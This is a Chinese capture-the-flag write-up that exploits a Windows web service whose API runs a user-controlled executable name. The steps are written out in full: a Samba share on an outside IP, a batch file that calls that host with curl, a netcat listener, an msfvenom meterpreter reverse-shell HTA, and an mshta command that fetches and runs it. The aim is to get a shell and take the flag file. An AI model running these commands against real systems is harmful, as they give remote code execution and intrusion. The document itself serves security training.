文艺复兴,朝花夕拾。备份一下。

知识点

1.Windows 特性

灵感来源:https://twitter.com/0xTib3rius/status/1608879696477065218

解题步骤

1.打开靶机,是这样一个界面,可以执行 ping 和 tracert。

从命令返回看是 Windows 系统。

2.抓包,发现这个接口。

是 Python 写的。

请求 /api?action=whoami,发现返回OK。

3.推测后端为 os.subprocess([action, ‘www.zhaoj.in’]),可执行文件名可控,结合其为 Windows,可以尝试用 UNC 路径进行攻击。

在自己的VPS上开一个 smb 服务器。

docker run -it -p 139:139 -p 445:445 -v /tmp:/share -d dperson/samba -s "public;/share"

然后在 /tmp 下创建一个 1.bat。

curl http://162.14.79.59:9988

给其赋予执行权限。

chmod 777 1.bat

然后监听端口

nc -lvnvp 9988

访问 /api?action=\162.14.79.59\public\1.bat, 就可以看到有请求弹回来了。

4.先生成下 MSF 马。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=162.14.121.186 LPORT=4444 -f hta-psh > shell.hta

然后对外放出来。

python3 -m http.server 9866

5.bat 改成如下。

mshta http://162.14.121.186:9866/shell.hta

MSF监听开着。

然后访问 /api?action=\162.14.79.59\public\1.bat。

即可收到回弹。

download C:\Th3Th1nsUW4nt.docx ./ 即可拿到flag文件。